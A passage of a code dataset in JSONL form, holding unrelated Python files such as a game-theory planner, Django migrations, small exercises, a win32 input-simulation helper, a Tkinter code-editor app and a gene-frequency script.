\"\").replace(\"\\\"\", \"\"))\n f.write(unicode(u'\\n'))\n\n except:\n return 0\n return 1\n\n def transformaData(self, data):\n\n if data == \" / / \":\n return '00000000'\n else:\n return data[6:]+data[3:5]+data[0:2]\n","sub_path":"WindowPublicacao.py","file_name":"WindowPublicacao.py","file_ext":"py","file_size_in_byte":28776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"281145701","text":"from competitive import Competitive\nfrom cooperative import Cooperative\nimport random\nimport math\nfrom scipy.special import log_softmax, softmax\n\nclass Planner():\n\n def __init__(self, environment, environment2, p_coop=1, p_comp=1):\n max_iter = 1000\n self.competitive_model1 = Competitive(environment, environment2, max_iter)\n self.competitive_model1.train()\n self.competitive_model2 = Competitive(environment2, environment, max_iter)\n self.competitive_model2.train()\n self.cooperative_model1 = Cooperative(environment, max_iter)\n self.cooperative_model1.train()\n self.cooperative_model2 = Cooperative(environment2, max_iter)\n self.cooperative_model2.train()\n self.models1 = [self.cooperative_model1, self.competitive_model1]\n self.models2 = [self.cooperative_model2, self.competitive_model2]\n self.environment1 = environment\n self.environment2 = environment2\n self.p_coop = p_coop\n self.p_comp = p_comp\n\n \"\"\"\n 0: coop\n 1: comp\n \"\"\"\n def infer(self, rounds1, rounds2):\n model2 = self.models2[self.intention(rounds1, self.cooperative_model1, self.competitive_model1)]\n model1 = self.models1[self.intention(rounds2, self.cooperative_model2, self.competitive_model2)]\n\n state = self.environment1.init_state\n while(True):\n a1 = model1.next_move(state)\n a2 = model2.next_move((state[1], state[0]))\n next_states = []\n next_probs = []\n for s in self.environment1.states:\n if (state, a1, a2, s) in self.environment1.transitions:\n next_states.append(s)\n next_probs.append(self.environment1.transitions[(state, a1, a2, s)])\n next_state = random.choices(next_states, next_probs)[0]\n transition = (state, a1, a2, next_state)\n if next_state == self.environment1.END_STATE:\n if transition in self.environment1.collab_state:\n return self.environment1.collab_state[transition]\n else:\n return -100\n state = next_state\n\n \n def intention(self, rounds, coop_model, comp_model):\n if len(rounds) == 0:\n return random.randint(0,1)\n total_coop = 0\n total_comp = 0\n for round in rounds:\n coop = coop_model.step(round) + math.log(self.p_coop)\n comp = comp_model.step(round) + math.log(self.p_comp)\n probs = log_softmax([coop, comp])\n total_coop += probs[0]\n total_comp += probs[1]\n probs = softmax([total_coop, total_comp])\n if random.random() < probs[0]:\n return 0\n else: \n return 1\n\n\n\n\n\n","sub_path":"planner.py","file_name":"planner.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"581824459","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='File',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('display_name', models.CharField(max_length=255)),\n ('file_name', models.CharField(unique=True, 
max_length=32)),\n ('uploaded', models.DateTimeField()),\n ],\n ),\n migrations.CreateModel(\n name='FileOwner',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n ),\n migrations.CreateModel(\n name='GroupMembership',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('joined', models.DateTimeField()),\n ('can_upload', models.BooleanField()),\n ],\n ),\n migrations.CreateModel(\n name='CustomUser',\n fields=[\n ('fileowner_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='file_share.FileOwner')),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(null=True, verbose_name='last login', blank=True)),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('email', models.EmailField(unique=True, max_length=255)),\n ('first_name', models.CharField(max_length=50, blank=True)),\n ('last_name', models.CharField(max_length=50, blank=True)),\n ('is_active', models.BooleanField(default=False)),\n ('is_staff', models.BooleanField(default=False)),\n ],\n options={\n 'abstract': False,\n },\n bases=('file_share.fileowner', models.Model),\n ),\n migrations.CreateModel(\n name='Group',\n fields=[\n ('fileowner_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='file_share.FileOwner')),\n ('name', models.CharField(max_length=80)),\n ('is_closed', models.BooleanField(default=False)),\n ],\n bases=('file_share.fileowner',),\n ),\n migrations.AddField(\n model_name='groupmembership',\n name='user',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='file',\n name='recipient',\n field=models.ForeignKey(related_name='received_files', to='file_share.FileOwner'),\n ),\n migrations.AddField(\n model_name='file',\n name='uploaded_by',\n field=models.ForeignKey(related_name='uploaded_files', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='groupmembership',\n name='group',\n field=models.ForeignKey(to='file_share.Group'),\n ),\n migrations.AddField(\n model_name='group',\n name='users',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='file_share.GroupMembership'),\n ),\n migrations.AddField(\n model_name='customuser',\n name='groups',\n field=models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', verbose_name='groups'),\n ),\n migrations.AddField(\n model_name='customuser',\n name='user_permissions',\n field=models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions'),\n ),\n ]\n","sub_path":"file_share/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444115786","text":"# Write a Python program to display the examination schedule. 
(extract the date from exam_st_date).\r\n\r\n'''\r\n\r\nexam_st_date = (11, 12, 2014)\r\nSample Output : The examination will start from : 11 / 12 / 2014\r\n\r\n'''\r\n\r\nexam_st_date = (11, 12, 2014)\r\ndate_list = list(exam_st_date)  # use a distinct name so the built-in list() is not shadowed\r\n\r\nprint(\"The examination will start from : \", str(date_list[0]), \" / \", str(date_list[1]), \" / \", str(date_list[2]))","sub_path":"ex9.py","file_name":"ex9.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368813039","text":"import random\n# re is used for regex validation of the input\nimport re\nguess = input('Guess the number I am thinking of: ')\ntarget = random.randint(1, 20)\nis_first_correct = False\ns = re.findall(r'\\D', guess)\nwhile len(s) != 0:\n    guess = input('Please enter a whole number: ')\n    s = re.findall(r'\\D', guess)\nif int(guess) == target:\n    print('Congratulations, you guessed it!')\n    is_first_correct = True\nwhile int(guess) != target:\n    if int(guess) < target:\n        print('Too low')\n    else:\n        print('Too high')\n    guess = input('Try again: ')\n    s = re.findall(r'\\D', guess)\n    while len(s) != 0:\n        guess = input('Please enter a whole number: ')\n        s = re.findall(r'\\D', guess)\nif not is_first_correct:\n    print('Congratulations, you guessed it!')\nprint('Game over!')\n\n","sub_path":"guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"136716012","text":"import win32gui\r\nimport win32con\r\nimport win32api\r\nimport time\r\nfrom ctypes import *\r\n\r\nclass EventsImitater():\r\n    def mouse_leftclick(self):  # single click\r\n        win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)\r\n        # press the left mouse button at the current position\r\n        win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)\r\n        # release the left mouse button at the current position\r\n    def mouse_rightclick(self):  # right click\r\n        win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)\r\n        win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)\r\n    def double_click(self):  # double click; each click must press AND release the button\r\n        i = 0\r\n        while i <= 1:\r\n            win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)\r\n            win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)\r\n            i += 1\r\n            time.sleep(0.05)\r\n    def wheel_down(self):  # scroll down: the wheel delta must be negative (multiples of 120)\r\n        win32api.mouse_event(win32con.MOUSEEVENTF_WHEEL, 0, 0, -120)\r\n    def wheel_up(self):  # scroll up: a positive delta scrolls up\r\n        win32api.mouse_event(win32con.MOUSEEVENTF_WHEEL, 0, 0, 120)\r\n    def read_mouseposition(self):\r\n        i = c_int(3)\r\n        pi = pointer(i)\r\n        win32api.MessageBox(0, str(pi[0]) + \" seconds until the mouse position is read!\", \"Attention!\", win32con.MB_ICONASTERISK)\r\n        for n in range(3, 0, -1):\r\n            pi[0] -= 1\r\n            print(pi[0])\r\n            time.sleep(1)\r\n        pos = win32api.GetCursorPos()\r\n        win32api.MessageBox(0, str(pos[0]) + \",\" + str(pos[1]), \"Mouse position\", win32con.MB_OK)\r\n        return pos\r\n    def move_mouse(self, new_x, new_y):\r\n        if new_y is not None and new_x is not None:\r\n            point = (new_x, new_y)\r\n            win32api.SetCursorPos(point)\r\n            self.x = new_x\r\n            self.y = new_y\r\n    def key_input(self, input_words):\r\n        # NOTE: VK_CODE (a key-name -> virtual-key-code mapping) is not defined in this file and must be provided elsewhere\r\n        for word in input_words:\r\n            win32api.keybd_event(VK_CODE[word], 0, 0, 0)\r\n            win32api.keybd_event(VK_CODE[word], 0, win32con.KEYEVENTF_KEYUP, 0)\r\n            time.sleep(0.05)\r\n    def key_event(self, input_key):\r\n        win32api.keybd_event(VK_CODE[input_key], 0, 0, 0)\r\n        win32api.keybd_event(VK_CODE[input_key], 0, win32con.KEYEVENTF_KEYUP, 0)\r\n        time.sleep(1)\r\n# testcode\r\n# test = EventsImitater()\r\n# pos = test.read_mouseposition()\r\n# i = 10\r\n# while i:\r\n#     test.move_mouse(pos[0],pos[1])\r\n#     i -= 1\r\n#     
time.sleep(1)\r\n\r\n","sub_path":"PersonalTools.py","file_name":"PersonalTools.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"637234967","text":"# MIT License\n\n# Original work Copyright (c) 2018 François Girault\n# Modified work Copyright 2020 Morten Eek\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport os\nimport model\nimport settings\nimport theme\nimport commands\nimport threading\nimport pickle\nimport sys\nimport tkinter as tk\nfrom commander import Commander\nfrom sidebar import SideBar\nfrom editor import EditorFrame\nfrom statusbar import StatusBar\nfrom xmlrpc.server import SimpleXMLRPCServer\nfrom tkinter import messagebox\nfrom collections import OrderedDict\n\n\nclass App:\n \"\"\"\n Tk Code application : builds the ui and exposes an api for business logic\n like a controller\n \"\"\"\n\n def __init__(self, tmp_dir, port_file, icon_file, python_path, data_dir):\n self.model = model.PWCodeModel() # observable data model\n self.model.add_observer(self)\n self.settings = settings.Settings(self.model)\n self.root = None\n\n self.sidebar = None\n self.notebook = None\n self.statusbar = None\n self.commander = None\n\n self.tmp_dir = tmp_dir\n self.data_dir = data_dir\n self.port_file = port_file\n self.icon_file = icon_file\n self.python_path = python_path\n self.recent_links = OrderedDict()\n\n def build_ui(self):\n \"\"\" builds the user interface \"\"\"\n self.root = root = tk.Tk(className=self.settings.name.lower()) # --> StartupWMClass = pwcode\n root.protocol(\"WM_DELETE_WINDOW\", self.quit_app)\n\n # img = tk.Image('photo', file=self.icon_file) # TODO: Denne virker med tk8.6 men ikke tk8.5\n # img = tk.PhotoImage(self.icon_file)\n\n root.tk.call('wm', 'iconphoto', root._w, tk.PhotoImage(file=self.icon_file))\n\n # root.tk.call('wm','iconphoto',root._w,img)\n # root.iconphoto(False, img)\n\n w = 1400 # width for the Tk root\n h = 900 # height for the Tk root\n ws = root.winfo_screenwidth()\n hs = root.winfo_screenheight()\n\n x = (ws/2) - (w/2)\n y = (hs/2) - (h/2)\n\n root.geometry('%dx%d+%d+%d' % (w, h, x, y))\n # root.option_add( \"*font\", \"gothic\" )\n # root.option_add(\"*Font\", \"Times 20 bold\")\n\n # def_font = tk.font.nametofont(\"TkDefaultFont\")\n # def_font.config(size=16)\n\n self.font = tk.font.nametofont(\"TkDefaultFont\")\n self.font.config(size=10) # WAIT: Gjør denne konfigurerbar. 
Også brukes av editor, eller fortsatt separat?\n\n style = theme.build_style(self.settings.colors)\n style.theme_use(\"pwcode\")\n\n self.commander = Commander(self)\n\n # WAIT: Lag funksjon som leser ut dette auto fra commands.py\n root.bind(\"\", lambda x: self.run_command('show_commands'))\n root.bind(\"\", lambda x: self.run_command('quit_app'))\n root.bind(\"\", lambda x: self.run_command('open_file'))\n root.bind(\"\", lambda x: self.run_command('open_folder'))\n root.bind(\"\", lambda x: self.run_command('new_file'))\n root.bind(\"\", lambda x: self.run_command('close_file'))\n root.bind(\"\", lambda x: self.run_command('save_file'))\n root.bind(\"\", lambda x: self.run_command('save_file_as'))\n root.bind(\"\", self.perform_ctrl_tab, True)\n\n root.bind(\"\", lambda x: self.run_command('next_tab_in_index'))\n root.bind(\"\", lambda x: self.run_command('next_tab_in_index')) # on keypad\n root.bind(\"\", lambda x: self.run_command('next_tab_in_index')) # on keypad with num lock\n\n root.bind(\"\", lambda x: self.run_command('previous_tab_in_index'))\n root.bind(\"\", lambda x: self.run_command('previous_in_index')) # on keypad\n root.bind(\"\", lambda x: self.run_command('previous_tab_in_index')) # on keypad with num lock\n\n root.bind(\"\", lambda x: self.run_command('increase_text_font'))\n root.bind(\"\", lambda x: self.run_command('decrease_text_font'))\n\n root.bind(\"\", self.perform_ctrl_return, True)\n root.bind_class(\"Text\", \"\", lambda e: None)\n root.bind_class(\"Text\", \"\", lambda e: None)\n root.bind(\"\", lambda x: self.run_command('kill_process'))\n\n root.bind_class(\"Text\", \"\", lambda e: None)\n root.bind_class(\"Text\", \"\", lambda e: None)\n root.bind(\"\", lambda x: self.run_command('toggle_comment'))\n root.bind(\"\", lambda x: self.run_command('toggle_comment')) # WAIT: Denne varianten for Alt-x også?\n\n # horizontal layout for the sidebar to expand / collapse panels\n self.paned = paned = tk.ttk.PanedWindow(root, orient=tk.HORIZONTAL)\n paned.pack(fill=tk.BOTH, expand=1)\n\n self.sidebar = SideBar(paned, self)\n paned.add(self.sidebar)\n\n self.editor_frame = EditorFrame(paned, self)\n paned.add(self.editor_frame)\n\n initial_status = ''\n self.statusbar = StatusBar(root, self, initial_status)\n self.statusbar.pack(fill=tk.X, side=tk.BOTTOM)\n\n def perform_ctrl_tab(self, event=None):\n self.run_command('previous_tab')\n return \"break\"\n\n def perform_ctrl_return(self, event=None):\n self.run_command('run_file')\n return \"break\"\n\n def quit_app(self):\n \"\"\" Exit program \"\"\"\n unsaved = False\n for tab_id in self.editor_frame.notebook.tabs():\n if '!hometab' not in str(tab_id):\n file_obj = self.editor_frame.id2path[tab_id]\n if file_obj.path in self.recent_links.keys():\n del self.recent_links[file_obj.path]\n self.recent_links.update({file_obj.path: file_obj})\n\n text_editor = self.editor_frame.notebook.nametowidget(tab_id)\n if text_editor.modified and not unsaved:\n unsaved = True\n\n if unsaved:\n confirm = messagebox.askyesno(\n message='You have unsaved changes. 
Are you sure you want to quit?',\n icon='question',\n title='Confirm Quit'\n )\n\n if unsaved and not confirm:\n return\n\n if os.path.exists(self.port_file):\n os.remove(self.port_file)\n\n for r, d, f in os.walk(self.tmp_dir):\n for file in f:\n path = self.tmp_dir + '/' + file\n if 'Untitled-' in file and os.path.getsize(path) == 0:\n os.remove(path)\n\n self.root.destroy()\n pickle.dump(self.recent_links, open(self.tmp_dir + \"/recent_files.p\", \"wb\"))\n\n def run(self, port):\n \"\"\" launch application and server \"\"\"\n threading.Thread(target=self.start_rcp_server, args=(port,), daemon=True).start()\n\n if not self.root:\n self.build_ui()\n self.root.mainloop()\n\n def focus(self):\n \"\"\" Focus existing frame \"\"\"\n self.root.wm_state('iconic')\n self.root.wm_state('normal')\n\n def start_rcp_server(self, port):\n server = SimpleXMLRPCServer(('localhost', int(port)), logRequests=False, allow_none=True)\n server.register_instance(self)\n server.serve_forever()\n\n def after(self, delay, command):\n \"\"\" proxy method to Tk.after() \"\"\"\n self.root.after(delay, command)\n\n def on_file_selected(self, file_obj):\n \"\"\" callback on file selection : set the window title \"\"\"\n base_title = ''\n if file_obj:\n if file_obj.path.startswith(self.tmp_dir + '/Untitled-'):\n base_title = file_obj.basename + ' - '\n else:\n base_title = file_obj.path + ' - '\n\n self.root.title(base_title + self.settings.name)\n\n def command_callable(self, name):\n \"\"\"create a callable of a command \"\"\"\n\n def _callback(*args, **kwargs):\n self.commander.run(name, *args, **kwargs)\n\n return _callback\n\n def run_command(self, name, *args, **kwargs):\n self.commander.run(name, *args, **kwargs)\n\n def select_file(self, file_obj, originator):\n \"\"\" set a file as selected \"\"\"\n self.model.set_current_file(file_obj, originator)\n","sub_path":"bin/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"425937230","text":"import praw\ndef processWikipage(reddit):\n wikiPage = reddit.subreddit('OpTicGaming').wiki['verification'].content_md\n lines = wikiPage.split(\"\\n\")\n users = []\n for line in lines:\n users.append(line.split(\",\"))\n return users\ndef generateFlairs(users):\n userFlairs = []\n for user in users:\n userFlair = {}\n userFlair['user'] = user[0].strip()\n flair = \":checkmark: {name} - {role}\".format(name = user[1].strip(), role = user[2].strip())\n userFlair['flair_text'] = flair\n userFlairs.append(userFlair)\n return userFlairs\ndef assignFlairs(flairs, reddit):\n css = 'verify'\n reddit.subreddit('OpTicGaming').flair.update(flair_list = flairs, css_class = css)\ndef main(reddit):\n users = processWikipage(reddit)\n flairs = generateFlairs(users)\n assignFlairs(flairs, reddit)","sub_path":"verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"529917135","text":"\n\nfrom xai.brain.wordbase.nouns._halberd import _HALBERD\n\n#calss header\nclass _HALBERDS(_HALBERD, ):\n\tdef __init__(self,): \n\t\t_HALBERD.__init__(self)\n\t\tself.name = \"HALBERDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"halberd\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_halberds.py","file_name":"_halberds.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"113025242","text":"class Dicionario:\n    '''\n    self.key holds the keys\n    self.values holds the repetition count of each key\n    '''\n    def __init__(self, string):\n        self.key = []\n        self.values = []\n        string = string.split()\n        for palavra in string:\n            valor = self.get(palavra)\n            if valor is None:\n                self.put(palavra, 1)\n            else:\n                self.put(palavra, valor + 1)\n\n    def __str__(self):\n        s = \"\"\n        for i in range(len(self.values)):\n            s += \"%s %d\\n\"%(self.key[i],self.values[i])\n        return s\n\n    def indice(self, chave):\n        '''\n        Binary search over the sorted keys.\n        :param chave: the key to search for\n        :return: (found, index)\n        '''\n        ini, fim = 0, len(self.key)\n        while ini < fim:\n            meio = (ini + fim)//2\n            if self.key[meio] == chave:\n                return True, meio\n            elif self.key[meio] < chave:\n                ini = meio + 1\n            else:\n                fim = meio\n        return False, ini\n\n    def get(self,chave):\n        achou, i = self.indice(chave)\n        if achou:\n            return self.values[i]\n        return None\n\n    def put(self, chave, valor):\n        achou, i = self.indice(chave)\n        if achou:\n            self.values[i] = valor\n        else:\n            self.key.append(0)\n            self.values.append(0)\n            # shift positions i..n-1 one slot to the right; the range must run down to j = i,\n            # otherwise the entry at position i is overwritten and lost\n            for j in range(len(self.key) - 2, i - 1, -1):\n                self.key[j + 1] = self.key[j]\n                self.values[j + 1] = self.values[j]\n            self.key[i] = chave\n            self.values[i] = valor\n\ndef main():\n    lst_pal = '30 33 40 55 55 60 60 66 70 88'\n    dicio = Dicionario(lst_pal)\n    dicio.put('20', 1)\n    dicio.put('10',1)\n    dicio.put('64',1)\n\n    print(dicio)\n\nif __name__ == \"__main__\":\n    main()","sub_path":"Dicionario/DicioBB.py","file_name":"DicioBB.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"43485559","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nurl = 'https://www.vanityfair.com/style/society/2014/06/monica-lewinsky-humiliation-culture'\r\nr = requests.get(url)\r\nsoup = BeautifulSoup(r.text, 'html.parser')\r\nwith open(\"demo.txt\", 'w', encoding='utf-8') as openfile:\r\n\r\n    for article in soup.find_all(class_=\"content-section\"):\r\n        openfile.write(str(article).strip())\r\n        #print(article.text)\r\n","sub_path":"webpage decode 2.py","file_name":"webpage decode 2.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"647768306","text":"# coding=utf-8\n# Copyright 2018-2020 EVA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom src.parser.select_statement import SelectStatement\nfrom src.parser.table_ref import TableRef\n\nfrom src.parser.evaql.evaql_parserVisitor import evaql_parserVisitor\nfrom src.parser.evaql.evaql_parser import evaql_parser\nfrom src.utils.logging_manager import LoggingLevel, LoggingManager\n\n##################################################################\n# TABLE 
SOURCES\n##################################################################\n\n\nclass TableSources(evaql_parserVisitor):\n def visitTableSources(self, ctx: evaql_parser.TableSourcesContext):\n\n table_list = []\n table_sources_count = len(ctx.tableSource())\n for table_sources_index in range(table_sources_count):\n table = self.visit(ctx.tableSource(table_sources_index))\n table_list.append(table)\n\n return table_list\n\n def visitTableSourceItemWithSample(\n self, ctx: evaql_parser.TableSourceItemWithSampleContext):\n sample_freq = None\n table = self.visit(ctx.tableSourceItem())\n if ctx.sampleClause():\n sample_freq = self.visit(ctx.sampleClause())\n return TableRef(table, sample_freq)\n\n # Nested sub query\n def visitSubqueryTableItem(\n self, ctx: evaql_parser.SubqueryTableItemContext):\n return self.visit(ctx.selectStatement())\n\n def visitUnionSelect(self, ctx: evaql_parser.UnionSelectContext):\n left_selectStatement = self.visit(ctx.left)\n right_selectStatement = self.visit(ctx.right)\n # This makes a difference becasue the LL parser (Left-to-right)\n while right_selectStatement.union_link is not None:\n right_selectStatement = right_selectStatement.union_link\n # We need to check the correctness for union operator.\n # Here when parsing or later operator, plan?\n right_selectStatement.union_link = left_selectStatement\n if ctx.unionAll is None:\n right_selectStatement.union_all = False\n else:\n right_selectStatement.union_all = True\n return right_selectStatement\n\n def visitQuerySpecification(\n self, ctx: evaql_parser.QuerySpecificationContext):\n target_list = None\n from_clause = None\n where_clause = None\n orderby_clause = None\n limit_count = None\n\n # first child will be a SELECT terminal token\n\n for child in ctx.children[1:]:\n try:\n rule_idx = child.getRuleIndex()\n if rule_idx == evaql_parser.RULE_selectElements:\n target_list = self.visit(child)\n\n elif rule_idx == evaql_parser.RULE_fromClause:\n clause = self.visit(child)\n from_clause = clause.get('from', None)\n where_clause = clause.get('where', None)\n\n elif rule_idx == evaql_parser.RULE_orderByClause:\n orderby_clause = self.visit(ctx.orderByClause())\n\n elif rule_idx == evaql_parser.RULE_limitClause:\n limit_count = self.visit(ctx.limitClause())\n\n except BaseException as e:\n # stop parsing something bad happened\n LoggingManager().log('Error while parsing \\\n visitQuerySpecification', LoggingLevel.ERROR)\n raise e\n\n # we don't support multiple table sources\n if from_clause is not None:\n from_clause = from_clause[0]\n\n select_stmt = SelectStatement(\n target_list, from_clause, where_clause,\n orderby_clause_list=orderby_clause,\n limit_count=limit_count)\n\n return select_stmt\n\n def visitSelectElements(self, ctx: evaql_parser.SelectElementsContext):\n select_list = []\n select_elements_count = len(ctx.selectElement())\n for select_element_index in range(select_elements_count):\n element = self.visit(ctx.selectElement(select_element_index))\n select_list.append(element)\n\n return select_list\n\n def visitFromClause(self, ctx: evaql_parser.FromClauseContext):\n from_table = None\n where_clause = None\n\n if ctx.tableSources():\n from_table = self.visit(ctx.tableSources())\n if ctx.whereExpr is not None:\n where_clause = self.visit(ctx.whereExpr)\n\n return {\"from\": from_table, \"where\": 
where_clause}\n","sub_path":"src/parser/parser_visitor/_table_sources.py","file_name":"_table_sources.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"540614308","text":"# -*- coding: utf-8 -*-\nimport re\n\n\n#注释符号\ncommentSymbol=\"#\"\n#表头\ntableHeadList = []\n#表头标识符\ntableHeadSymbol = \"CHROM\"\n#数据的统计\ndataMap = {}\n#数据的输出列表\ndataList = []\n\nwith open(\"./test.txt\") as infile:\n for line in infile:\n line = line.strip()\n #去除注释行\n if ( line.startswith(commentSymbol)):\n continue \n \n if ( line.startswith(tableHeadSymbol)):\n tableHead = re.split(\"\\s+\", line)\n tableHeadList = tableHead[:4]\n continue\n #数据行\n elementList = []\n elementList = re.split(\"\\s+\", line)\n #DP4数据列获取\n freqList = re.split(\";\", elementList[31])\n #DP4数据获取\n DP4String = freqList[-2]\n #DP4数据集\n DP4_list= re.split(\"=\",DP4String)[-1].split(\",\")\n #DP4精度换算\n DP4_list=[ float(x) for x in DP4_list]\n #DP4频率计算\n freq=(DP4_list[2]+DP4_list[3])/sum(DP4_list)\n #CHROM\tPOS\t\tREF\tALT\n gene_position = elementList[:5]\n del gene_position[2]\n\n #频率列\n freStr = str(round(freq,3))\n gene_position.append(freStr)\n #存在相同的基因则取出并且count加1 同时添加最大值 最小值\n genKeyId = gene_position[:4]\n genKey = \",\".join(genKeyId)\n if ( dataMap.has_key(genKey)) :\n for element in dataList :\n listId = element[:4]\n listKey = \",\".join(listId)\n if (listKey == genKey) :\n\n fre = element[-1]+\",\"+freStr\n element[-1] = fre\n continue\n else:\n dataMap[genKey] = gene_position[-1]\n dataList.append(gene_position)\n \n\n\n\n \ntableHeadList.append(\"count\")\ntableHeadList.append(\"min\")\ntableHeadList.append(\"max\")\nf=open('newfile', 'w')\n\nfor headElement in tableHeadList :\n f.write(headElement)\n f.write(\"\\t\")\nf.write(\"\\n\")\n\nfor element in dataList :\n for data in element :\n f.write(str(data))\n f.write(\"\\t\")\n freInfo = str(element[-1])\n freInfoList = freInfo.split(\",\")\n f.write(str(len(freInfoList)))\n f.write(\"\\t\")\n f.write(min(freInfoList))\n f.write(\"\\t\")\n f.write(max(freInfoList))\n f.write(\"\\n\")\n\nf.close()\n\n\n","sub_path":"bio/baseline_count.py","file_name":"baseline_count.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"121385070","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef make_waffles(apps, schema_editor):\n # Create the waffle flags and switches we currently need.\n Flag = apps.get_model('waffle', 'Flag')\n Switch = apps.get_model('waffle', 'Switch')\n\n Flag.objects.create(\n name='feedbackdev',\n everyone=False,\n superusers=False,\n staff=False,\n authenticated=False,\n rollout=False,\n note='',\n testing=False)\n\n Flag.objects.create(\n name='ditchchart',\n everyone=False,\n superusers=False,\n staff=False,\n authenticated=False,\n rollout=False,\n note='',\n testing=False)\n\n Switch.objects.create(\n name='gengosystem',\n note='Enables/disables Gengo API usage',\n active=True)\n\n Flag.objects.create(\n name='thankyou',\n everyone=False,\n superusers=False,\n staff=False,\n authenticated=False,\n rollout=False,\n note='',\n testing=False)\n\n\ndef remove_waffles(apps, schema_editor):\n # Create the waffle flags and switches we currently need.\n Flag = apps.get_model('waffle', 'Flag')\n Switch = apps.get_model('waffle', 'Switch')\n\n Flag.objects.filter(\n name__in=['feedbackdev', 'ditchchart', 
